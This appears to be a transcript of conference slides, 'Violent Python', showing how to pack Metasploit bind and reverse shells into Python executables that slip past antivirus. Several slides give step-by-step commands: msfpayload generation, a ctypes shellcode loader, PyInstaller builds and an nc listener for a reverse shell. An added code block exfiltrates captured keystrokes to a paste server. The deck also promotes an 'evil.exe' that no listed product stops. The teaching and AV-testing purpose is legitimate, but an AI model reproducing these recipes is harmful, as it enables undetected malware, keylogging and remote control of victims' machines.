Slide 1
Violent Python
MPICT Winter 2015 ICT Educator Conference
San Francisco
Mon, Jan 5 2015
Slide 2
Bio
Slide 3
CNIT 124
Advanced Ethical Hacking
Slide 4
Violent Python
Good coding principles
Exception handling
Modular design
Optimization
Commenting
Flow charts
FORGET THEM ALL
Slide 5
Violent Python
We are hackers
We are here to BREAK STUFF
It should be fast and easy for a complete novice to hack together a simple script to do something fun!
Slides 6, 7, 8 (no text)
Slide 9
Projects
Slide 10 (no text)
Slide 11
Antivirus
Ungh! Good God y'all...
What is it GOOD for?
Slide 12 (no text)
Slide 13
Mikko Hypponen Video
Slide 14
Metasploit Payloads
Slide 15
Metasploit
Hundreds of payloads
The simplest one: bind_tcp
Listens on a TCP port for commands
Slide 16
Simple Reverse Shell
One command to produce very simple Windows EXE malware
Slide 17
Antivirus Catches It
Slide 18
Norton v. Shell.exe
Slide 19
Norton Identifies the Metasploit Packer
Slide 20
VirusTotal: 37/49 Detections
Slide 21
How to Become 007
Slide 22 (no text)
Slide 23
Python v. AV
Round 1
shell_bind_tcp
Slide 24
Export Metasploit Payloads to C
Slide 25
Use the ctypes Python library
Slide 26
Compile it on Windows
Install these things, in order:
Python 2.7
PyWin32
pip-Win
PyInstaller
This creates an EXE file that listens on a TCP port
Slide 27
DEMO
On Kali:
msfpayload windows/shell_bind_tcp C > foo
nano foo
Change the top to:
from ctypes import *
shellcode = (
Change the bottom to:
)
memorywithshell = create_string_buffer(shellcode, len(shellcode))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()
Slide 28
DEMO
On Windows, in pip-Win:
venv -c -i pyi-env-name
pyinstaller --onefile --noconsole foo
Slide 29
VirusTotal: 1/50 Detection
Slide 30
Norton Support
I Tweeted about this, and @NortonSupport replied
VirusTotal is not a fair test, because real installed Norton uses Heuristic Scanning
@NortonSupport gave me a link for a 30-day trial version :)
Slide 31
Norton Wins!
Slide 32
Kaspersky Wins!
Avast! doesn't detect it
Kaspersky detects it as HEUR:Trojan.Win32.Generic
Slide 33
Python v. AV
Round 2
shell_bind_tcp with a delay
Slides 34, 35 (no text)
Slide 36
DEMO
On Kali:
cp foo foo2
nano foo2
Add this line at the top:
x=raw_input("Press Enter to continue")
On Windows, in pip-Win:
venv -c -i pyi-env-name
pyinstaller --onefile foo2
Slide 37
Norton, Avast, & MSE Lose!
Slide 38
Kaspersky Wins!
Slide 39
Python v. AV
Round 3
shell_bind_tcp in two stages, no delay
Slide 40
Other AV
Tested on Mar 24, 2014 with a two-stage reverse shell and no time delay
All these failed:
Norton
Nod32
Avast!
360 Internet Security
McAfee
Kaspersky
Slide 41
Remember Mikko?
Slide 42
F-Secure Wins!
Slide 43
AV Challenge
Slide 44
Posted April 3, 2014
No reply from AV vendors, but Norton improved its detection after that
Now a delay is required
Slide 45
Python v. AV
Round 4
shell_bind_tcp with a delay
Slide 46
INSTRUCTIONS
On Kali:
msfpayload windows/shell_reverse_tcp LHOST=192.168.119.252 C > rev
nano rev
Change the top to:
x=raw_input("Press Enter to continue")
from ctypes import *
shellcode = (
Change the bottom to:
)
memorywithshell = create_string_buffer(shellcode, len(shellcode))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()
Slide 47
INSTRUCTIONS
On Windows, in pip-Win:
venv -c -i pyi-env-name
pyinstaller --onefile rev
On Kali:
nc -lp 4444
Slide 48
Norton Loses
Slide 49
Kaspersky Wins
Slide 50
Advanced Malware Protection
Slide 51
Thanks to @ChrisAbdalla_1 from HP ESP TippingPoint
Slide 52
A friend in the financial industry tested Evil.exe on a system protected by FireEye
FireEye gives no alerts and lets it post keystrokes right to Pastebin
Slide 53
Python Keylogger
Slide 54
Google "Python Keylogger"
I used this one from 4 years ago
Slide 55
Post Keystrokes to Pastebin
Slide 56
Problem
Pastebin busted me for making too many pastes in a 24-hour period
So I wrote my own Pastebin imitation
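Added example, not the slides' code: a Python 3 stand-in for the "Pastebin imitation" of Slide 56. The receiver is a small `http.server` that stores form-encoded pastes and, to mirror the failure mode on Slide 56, answers HTTP 429 once one client passes a per-client cap; the client function posts captured text the way the keylogger of Slides 53-55 would. The endpoint path `/api`, the field name `paste_code`, the cap of 3 and the keystroke chunks are all constructed for the demo; the keylogger itself is not included.

```python
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer


class PasteStore:
    """Pastes received so far, plus a per-client cap. Pastebin's real limit
    is not given on the slides; the number here is an assumption."""

    def __init__(self, max_per_client=3):
        self.max_per_client = max_per_client
        self.pastes = []
        self.counts = {}
        self.lock = threading.Lock()

    def add(self, client_ip, text):
        with self.lock:
            n = self.counts.get(client_ip, 0)
            if n >= self.max_per_client:
                return False  # over the cap: reject, as Pastebin did
            self.counts[client_ip] = n + 1
            self.pastes.append(text)
            return True


def make_handler(store):
    class PasteHandler(BaseHTTPRequestHandler):
        # Accepts form-encoded POSTs; the field name paste_code is my choice.
        def do_POST(self):
            length = int(self.headers.get("Content-Length", 0))
            body = self.rfile.read(length).decode("utf-8", "replace")
            text = urllib.parse.parse_qs(body).get("paste_code", [""])[0]
            if store.add(self.client_address[0], text):
                self.send_response(200)
                self.end_headers()
                self.wfile.write(b"ok")
            else:
                self.send_response(429)
                self.end_headers()
                self.wfile.write(b"too many pastes")

        def log_message(self, *args):  # keep the demo quiet
            pass

    return PasteHandler


def start_server(store, port=0):
    """Bind the imitation on 127.0.0.1 (port 0 = any free port) in a thread."""
    httpd = HTTPServer(("127.0.0.1", port), make_handler(store))
    threading.Thread(target=httpd.serve_forever, daemon=True).start()
    return httpd


def post_keys(url, text):
    """Client side, as the keylogger would do it: POST one chunk of captured
    text and return the HTTP status (200 stored, 429 rate-limited)."""
    data = urllib.parse.urlencode({"paste_code": text}).encode()
    try:
        with urllib.request.urlopen(url, data=data, timeout=5) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def demo(limit=3):
    """Run the server, post five constructed keystroke chunks, and return
    (status codes in order, pastes the server kept)."""
    store = PasteStore(max_per_client=limit)
    httpd = start_server(store)
    url = "http://127.0.0.1:%d/api" % httpd.server_address[1]
    chunks = ["[notepad] hello", "[browser] user@example", "[browser] hunter2",
              "[notepad] more", "[notepad] text"]  # constructed sample input
    statuses = [post_keys(url, c) for c in chunks]
    httpd.shutdown()
    httpd.server_close()
    return statuses, list(store.pastes)


if __name__ == "__main__":
    print(demo())
```

From the detection side this is also the traffic to look for: small, frequent, form-encoded POSTs from a desktop process to a paste site, which is exactly what Slide 52 reports FireEye letting through.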
Slide 57
Kaspersky & Avast! LOSE
Slide 58
Norton WINS!
Slide 59
But just add a delay...
Slide 60
F-Secure LOSES!
Slide 61
PRODUCT ANNOUNCEMENT!
Slide 62
Ultra-Advanced APT Tool
samsclass.info/evil.exe
Slide 63 (no text)
Slide 64
UNSTOPPABLE
None of these products stop it:
Norton
McAfee
Kaspersky
Nod32
F-Secure
Avast!
Microsoft Security Essentials